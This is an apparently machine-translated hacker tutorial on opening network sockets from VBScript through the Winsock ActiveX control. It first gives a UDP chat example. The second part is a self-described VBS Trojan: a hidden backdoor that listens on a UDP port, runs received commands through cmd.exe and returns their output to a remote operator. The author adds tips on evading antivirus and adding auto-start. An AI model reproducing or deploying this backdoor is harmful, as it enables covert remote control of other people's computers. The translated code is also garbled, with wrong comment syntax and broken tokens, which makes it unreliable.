About a year ago, the VBS script virus went viral again. A large group of VBS viruses were prevalent on the Internet. At that time, almost all VBS used FSO and MAPI as a virus transmission engine. So I thought, can VBS access the network? If it can also connect to the port, that's amazing. Since then, I have tried my best to find information about the VBS network. Unfortunately, after a long time, I did not get any results until the College Entrance Examination ended a month ago, so that I can calm down and make some progress.
Now let's analyze how VBS works. The full name of VBS is "Visual Basic Scripts". Because VBS is an object-oriented scripting language separated by Visual Basic, its syntax is similar to that of Visual Basic, it also relies on objects to implement other advanced functions. The only difference is that vbsuses wscript.exeor cscript.exe to explain it. Therefore, it does not need to be compiled and runs directly. Therefore, this is one of the specialties of VBS script as a hacker tool: general anti-virus software will not be interested in VBS. Because VBS is an object-oriented scripting language, many ActiveX components of Microsoft can use "CreateObject (" ObjectName ")" to create references, this may be a program interface of Microsoft! Some friends who have used VB to write network programs know that there are roughly two types of network programs written with VB: one is to call Windows API functions, and the other is to use the Winsock control that comes with VB, that is, the "MSWinsock. ocx ". Because the API functions of the former are complicated, many friends prefer to use the Winsock control that comes with VB. I wonder if you have noticed that the Winsock Control is actually the ActiveX Component I mentioned earlier, it provides a convenient way to access TCP and UDP network services. For writing client or server applications, you do not have to understand TCP details or call low-level Winsock APIs. You can easily connect to a remote machine by setting the properties of the control and calling the method, and exchange data in two directions. How can I use a network access engine? Is it not used in VB?
The usage of the Winsock Control is basically the same as that of VB. However, in VBS, ActiveX control is not visible as in VB, to reference it on VBS, of course, it is the object that is created first. The creation method is like creating a FSO object. Create a new text file and write it into it:
--------------------------------------------------
Set Sock = CreateObject ("MSWinsock. Winsock ")
Sock. AboutBox
--------------------------------------------------
Save it as *. vbs and run it to view the WinSock Control registered in your system.
How can this problem be solved? Be happy. Don't worry. I will discuss it in detail below. Now that the object is successfully created, use it as in VB. The WinScok created in VBS cannot set parameters just like the graphic interface in VB. It is necessary to set the protocols you have created step by step. The Protocol to be set in the WinSock Control is set through "Protocol", for example, sock. Protocol = 0 or sock. Protocol = 1. Note: When the value of "Protocol" is "0", the created Protocol is TCP; when the value is "1", UDP is created.
Let me first introduce the basic methods and events for WinSock Control Reference:
LocalHostName // obtain the local host name
LocalIP // obtain the IP address of the local host
SocketHandle // obtain the SOCK creation handle
RemotePort // set or obtain the remote port
LocalPort // set or obtain the local port
State // return the object status of the created sock (generation as follows ){
0 is the default value. Close
1 open
2 listener
3. Connection suspended
4. Identify hosts
5 identified hosts
6. Connecting
7 connected
8 similar personnel are closing the connection
9 error}
BytesReceived // return the number of received (currently in the receiver buffer) data
Connect (RemoteHost, RemotePort) // establishes a remote connection, RemoteHost Remote Host IP address, and RemotePort remote host port
Listen // enable SOCK to Listen
SendData/GetData // send or receive data
Close // Close the object
Bind (LocalPort, LocalIP) // Bind the local port.
The basic things I have finished, I will test the remote host will talk about it (UDP), below is a VBS file, you can try, the Code is as follows (File sock-udp.vbs ):
----------------------------------------
Dim revdata
Dim sendata
// Create a Winsock Image
Set sock = createobject ("MSWinsock. Winsock ")
// Use the UDP protocol
// Establish a connection
Sock. Protocol = 1sock. Connect "127.0.0.1", 1234
// Define the data to be sent
Sendata = "Hello !!! "& Chr (13)
// Send the data to be sent
Sock. senddata sendata
Do
// Display it if there is a response to the data
If sock. BytesReceived> 0 then
// Define the receiving data type (the data types include vbByte, vbInteger, vbLong, and vbSingle
// VbDouble, vbCurrency, vbDate, vbBoolean, vbError, vbString, vbArray + vbByte)
// Only the data type to be received can be defined, otherwise a bunch of garbled characters will be received;
Sock. getdata revdata, vbString;
Sendata = inputbox (revdata, "RecviedData", "Enter your message ")
Sock. senddata & chr (13)
// Terminate the VBS process when the string "exit" is received
If instr (revdata, "exit") then exit do
Else
End if
Loop
// Close the image set
Sock. close
------------------------------------------
Then, use "nc-u-l-p 1234" to listen to the local UDP port 1234, and then run the VBS file you just compiled! My NC is responding.
The "MicroSoft (r) Windows Based Script Host" in it is our main VBS process. In NC, we can send messages and chat. How can this problem be solved? A simple udp c/S has been completed. Next, let me write another example about how to use it. Since it can access the network, it is certainly used as a VBS Trojan! Old editors won't disagree! Haha, Let's Go!
--------------------------
Dim revdata
Set sock = createobject ("MSWinsock. Winsock ")
Set SC = createobject ("WScript. Shell ")
Set fso = CreateObject ("Scripting. FileSystemObject ")
Sock. Protocol = 1 // This is the identifier of the UDP Protocol.
Sock. bind 1234 // bind the local UDP port
Do
If sock. BytesReceived> 0 then
Sock. getdata revdata, vbString
If instr (revdata, "exit")> 0 then
Exit do
Else
On error resume next
Tempfile = "C: \" & fso. GetTempName
'Cmd = right (revdata, len (revdata)-4)
Cmd = left (revdata, len (revdata)-3)
// Use the output bound to cmd
Call SC. Run ("cmd.exe/c" & cmd & ">" & tempfile, 0, True)
Set txf = fso. OpenTextFile (tempfile, 1, false, 0)
// Read the output file into the memory and send it to the client using SendData
Sock. senddata txf. readall & vbcrlf
Txf. close
Call fso. DeleteFile (TempFile, True)
End if
// Hey, here is my copyright
Sock. senddata "-- End --" & vbcrlf & "ForHelp exit: end | run: <RunFileName>" & vbcrlf & "Maked by Attrib Data: 2004.7.28" & vbcrlf
End if
Loop
Sock. senddata "Connection closed! "& Vbcrlf
Sock. close
Sock = nothings
-------------------
At this point, the basic architecture of the Code has been completed. If you want to build an all-powerful Trojan, you can add such as automatic startup in the code. Because the VBS program does not set error protection, some incorrect operations may crash. If you are interested, try it on your own. This VBS backdoor is first run on the server and then connected to your NC. Because the UDP protocol is used, the NC command line is "NC-u IP Port ", remember to add the "-u" parameter and use it like WinShell. The following is a test on my machine.
As for how to write TCP, the principle is similar to UDP. I will not write more here. You can study it on your own.
If you have any good methods, you can study them with me. Thank you for watching.
